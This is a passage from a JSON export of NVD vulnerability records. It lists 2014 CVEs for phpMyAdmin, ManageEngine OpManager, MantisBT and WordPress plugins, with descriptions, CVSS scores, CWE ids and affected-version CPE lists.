"cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.6:*:*:*:*:*:*:*", 
"cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.9:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:00:37", "description": "Directory traversal vulnerability in the com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector servlet in ZOHO ManageEngine OpManager 8.8 through 11.3, Social IT Plus 11.0, and IT360 10.4 and earlier allows remote attackers or remote authenticated users to write to and execute arbitrary WAR files via a .. (dot dot) in the regionID parameter.", "cvss3": {}, "published": "2014-12-04T17:59:00", "type": "cve", "title": "CVE-2014-6034", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6034"], "modified": "2014-12-05T13:45:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager:9.1", "cpe:/a:zohocorp:manageengine_opmanager:11.3", "cpe:/a:zohocorp:manageengine_opmanager:10.1", "cpe:/a:zohocorp:manageengine_opmanager:11.1", "cpe:/a:zohocorp:manageengine_opmanager:9.2", "cpe:/a:zohocorp:manageengine_opmanager:10.2", "cpe:/a:zohocorp:manageengine_it360:10.4", "cpe:/a:zohocorp:manageengine_social_it_plus:11.0", "cpe:/a:zohocorp:manageengine_opmanager:11.0", "cpe:/a:zohocorp:manageengine_opmanager:8.8", "cpe:/a:zohocorp:manageengine_opmanager:11.2", "cpe:/a:zohocorp:manageengine_opmanager:9.4", "cpe:/a:zohocorp:manageengine_opmanager:9.0", "cpe:/a:zohocorp:manageengine_opmanager:10.0"], "id": "CVE-2014-6034", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6034", "cvss": {"score": 5.0, "vector": 
"AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_opmanager:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.2:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.3:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_it360:10.4:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:9.4:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:10.1:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:8.8:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_social_it_plus:11.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:00:40", "description": "Directory traversal vulnerability in the multipartRequest servlet in ZOHO ManageEngine OpManager 11.3 and earlier, Social IT Plus 11.0, and IT360 10.3, 10.4, and earlier allows remote attackers or remote authenticated users to delete arbitrary files via a .. 
(dot dot) in the fileName parameter.", "cvss3": {}, "published": "2014-12-04T17:59:00", "type": "cve", "title": "CVE-2014-6036", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6036"], "modified": "2019-07-15T17:45:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager:11.3", "cpe:/a:zohocorp:manageengine_it360:10.4", "cpe:/a:zohocorp:manageengine_social_it_plus:11.0", "cpe:/a:zohocorp:manageengine_it360:10.3.0"], "id": "CVE-2014-6036", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6036", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_it360:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_it360:10.4:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.3:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_social_it_plus:11.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:06:58", "description": "Multiple SQL injection vulnerabilities in the All In One WP Security & Firewall plugin before 3.8.3 for WordPress allow remote authenticated users to execute arbitrary SQL commands via the (1) orderby or (2) order parameter in the aiowpsec page to wp-admin/admin.php. 
NOTE: this can be leveraged using CSRF to allow remote attackers to execute arbitrary SQL commands.", "cvss3": {}, "published": "2014-10-02T14:55:00", "type": "cve", "title": "CVE-2014-6242", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6242"], "modified": "2018-10-09T19:50:00", "cpe": ["cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall:3.8.2"], "id": "CVE-2014-6242", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6242", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall:3.8.2:*:*:*:*:wordpress:*:*"]}, {"lastseen": "2022-03-23T14:00:38", "description": "Directory traversal vulnerability in the FileCollector servlet in ZOHO ManageEngine OpManager 11.4, 11.3, and earlier allows remote attackers to write and execute arbitrary files via a .. 
(dot dot) in the FILENAME parameter.", "cvss3": {}, "published": "2014-12-04T17:59:00", "type": "cve", "title": "CVE-2014-6035", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6035"], "modified": "2014-12-05T13:33:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager:11.4", "cpe:/a:zohocorp:manageengine_opmanager:11.3"], "id": "CVE-2014-6035", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6035", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_opmanager:11.3:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.4:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:32:25", "description": "server_user_groups.php in phpMyAdmin 4.1.x before 4.1.14.2 and 4.2.x before 4.2.6 allows remote authenticated users to bypass intended access restrictions and read the MySQL user list via a viewUsers request.", "cvss3": {}, "published": "2014-07-20T11:12:00", "type": "cve", "title": "CVE-2014-4987", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2014-4987"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin:4.1.11", "cpe:/a:phpmyadmin:phpmyadmin:4.1.8", "cpe:/a:phpmyadmin:phpmyadmin:4.2.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.5", "cpe:/a:phpmyadmin:phpmyadmin:4.1.12", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14", "cpe:/a:phpmyadmin:phpmyadmin:4.1.13", "cpe:/o:opensuse:opensuse:12.3", "cpe:/a:phpmyadmin:phpmyadmin:4.2.4", "cpe:/a:phpmyadmin:phpmyadmin:4.1.4", "cpe:/a:phpmyadmin:phpmyadmin:4.1.1", "cpe:/a:phpmyadmin:phpmyadmin:4.2.5", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.6", "cpe:/a:phpmyadmin:phpmyadmin:4.1.9", "cpe:/a:phpmyadmin:phpmyadmin:4.1.2", "cpe:/a:phpmyadmin:phpmyadmin:4.1.7", "cpe:/a:phpmyadmin:phpmyadmin:4.2.2", "cpe:/a:phpmyadmin:phpmyadmin:4.1.0", "cpe:/a:phpmyadmin:phpmyadmin:4.2.0", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.10", "cpe:/a:phpmyadmin:phpmyadmin:4.2.3", "cpe:/a:phpmyadmin:phpmyadmin:4.1.3"], "id": "CVE-2014-4987", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4987", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:12.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.9:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.4:*:*:*:*:*:*:*", 
"cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.6:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:32:23", "description": "Multiple cross-site scripting (XSS) vulnerabilities in js/functions.js in phpMyAdmin 4.0.x before 4.0.10.1, 4.1.x before 4.1.14.2, and 4.2.x before 4.2.6 allow remote authenticated users to inject arbitrary web script or HTML via a crafted (1) table name or (2) column name that is improperly handled during construction of an AJAX confirmation message.", "cvss3": {}, "published": "2014-07-20T11:12:00", "type": "cve", "title": "CVE-2014-4986", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4986"], "modified": "2016-12-22T02:59:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin:4.1.11", "cpe:/a:phpmyadmin:phpmyadmin:4.0.10", "cpe:/a:phpmyadmin:phpmyadmin:4.1.8", "cpe:/a:phpmyadmin:phpmyadmin:4.1.5", "cpe:/a:phpmyadmin:phpmyadmin:4.2.1", "cpe:/a:phpmyadmin:phpmyadmin:4.0.9", "cpe:/a:phpmyadmin:phpmyadmin:4.1.12", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14", "cpe:/a:phpmyadmin:phpmyadmin:4.1.13", "cpe:/a:phpmyadmin:phpmyadmin:4.0.2", 
"cpe:/a:phpmyadmin:phpmyadmin:4.2.4", "cpe:/a:phpmyadmin:phpmyadmin:4.0.0", "cpe:/a:phpmyadmin:phpmyadmin:4.0.4", "cpe:/a:phpmyadmin:phpmyadmin:4.0.8", "cpe:/a:phpmyadmin:phpmyadmin:4.0.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.4", "cpe:/a:phpmyadmin:phpmyadmin:4.1.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.6", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14.1", "cpe:/a:phpmyadmin:phpmyadmin:4.2.5", "cpe:/a:phpmyadmin:phpmyadmin:4.1.9", "cpe:/a:phpmyadmin:phpmyadmin:4.1.2", "cpe:/a:phpmyadmin:phpmyadmin:4.1.7", "cpe:/a:phpmyadmin:phpmyadmin:4.0.3", "cpe:/a:phpmyadmin:phpmyadmin:4.0.4.1", "cpe:/a:phpmyadmin:phpmyadmin:4.2.2", "cpe:/a:phpmyadmin:phpmyadmin:4.0.5", "cpe:/a:phpmyadmin:phpmyadmin:4.0.7", "cpe:/a:phpmyadmin:phpmyadmin:4.1.0", "cpe:/a:phpmyadmin:phpmyadmin:4.2.0", "cpe:/a:phpmyadmin:phpmyadmin:4.0.6", "cpe:/a:phpmyadmin:phpmyadmin:4.1.10", "cpe:/a:phpmyadmin:phpmyadmin:4.2.3", "cpe:/a:phpmyadmin:phpmyadmin:4.0.4.2", "cpe:/a:phpmyadmin:phpmyadmin:4.0.10.0", "cpe:/a:phpmyadmin:phpmyadmin:4.1.3"], "id": "CVE-2014-4986", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4986", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.11:*:*:*:*:*:*:*", 
"cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:13:26", "description": "Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 4.1.x before 4.1.14.1 and 4.2.x before 4.2.4 allow remote authenticated users to inject arbitrary web script or HTML via a crafted table name that is improperly handled after a (1) hide or (2) unhide action.", "cvss3": {}, "published": "2014-06-25T11:19:00", "type": "cve", "title": "CVE-2014-4349", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4349"], "modified": "2015-09-02T17:11:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin:4.1.11", "cpe:/a:phpmyadmin:phpmyadmin:4.1.8", "cpe:/a:phpmyadmin:phpmyadmin:4.2.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.5", "cpe:/a:phpmyadmin:phpmyadmin:4.1.12", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14", "cpe:/a:phpmyadmin:phpmyadmin:4.1.13", "cpe:/a:phpmyadmin:phpmyadmin:4.1.4", "cpe:/a:phpmyadmin:phpmyadmin:4.1.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.6", "cpe:/a:phpmyadmin:phpmyadmin:4.1.9", "cpe:/a:phpmyadmin:phpmyadmin:4.1.2", "cpe:/a:phpmyadmin:phpmyadmin:4.1.7", "cpe:/a:phpmyadmin:phpmyadmin:4.2.2", "cpe:/a:phpmyadmin:phpmyadmin:4.1.0", "cpe:/a:phpmyadmin:phpmyadmin:4.2.0", "cpe:/a:phpmyadmin:phpmyadmin:4.1.10", "cpe:/a:phpmyadmin:phpmyadmin:4.2.3", "cpe:/a:phpmyadmin:phpmyadmin:4.1.3"], "id": "CVE-2014-4349", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4349", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.3:*:*:*:*:*:*:*", 
"cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.6:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:07:01", "description": "Cross-site scripting (XSS) vulnerability in the EWWW Image Optimizer plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the error parameter in the ewww-image-optimizer.php page to wp-admin/options-general.php, which is not properly handled in a pngout error message.", "cvss3": {}, "published": "2014-10-10T14:55:00", "type": "cve", "title": "CVE-2014-6243", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6243"], "modified": "2018-10-09T19:50:00", "cpe": ["cpe:/a:ewww_image_optimizer_plugin_project:ewww_image_optimizer_plugin:2.0.0", "cpe:/a:ewww_image_optimizer_plugin_project:ewww_image_optimizer_plugin:2.01"], "id": "CVE-2014-6243", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6243", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:ewww_image_optimizer_plugin_project:ewww_image_optimizer_plugin:2.01:*:*:*:*:wordpress:*:*", "cpe:2.3:a:ewww_image_optimizer_plugin_project:ewww_image_optimizer_plugin:2.0.0:*:*:*:*:wordpress:*:*"]}, {"lastseen": "2022-03-23T12:24:31", "description": "SQL injection 
vulnerability in the mci_file_get function in api/soap/mc_file_api.php in MantisBT before 1.2.16 allows remote attackers to execute arbitrary SQL commands via a crafted envelope tag in a mc_issue_attachment_get SOAP request.", "cvss3": {}, "published": "2014-03-18T17:03:00", "type": "cve", "title": "CVE-2014-1608", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1608"], "modified": "2021-01-12T18:05:00", "cpe": ["cpe:/a:mantisbt:mantisbt:1.2.11", "cpe:/a:mantisbt:mantisbt:1.2.10", "cpe:/a:mantisbt:mantisbt:1.2.0", "cpe:/a:mantisbt:mantisbt:1.2.3", "cpe:/a:mantisbt:mantisbt:1.2.6", "cpe:/a:mantisbt:mantisbt:1.2.15", "cpe:/a:mantisbt:mantisbt:1.2.7", "cpe:/o:debian:debian_linux:7.0", "cpe:/a:mantisbt:mantisbt:1.2.4", "cpe:/a:mantisbt:mantisbt:1.2.8", "cpe:/a:mantisbt:mantisbt:1.2.9", "cpe:/a:mantisbt:mantisbt:1.2.2", "cpe:/a:mantisbt:mantisbt:1.2.13", "cpe:/a:mantisbt:mantisbt:1.2.1", "cpe:/a:mantisbt:mantisbt:1.2.5", "cpe:/a:mantisbt:mantisbt:1.2.14"], "id": "CVE-2014-1608", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1608", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mantisbt:mantisbt:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.15:*:*:*:*:*:*:*", 
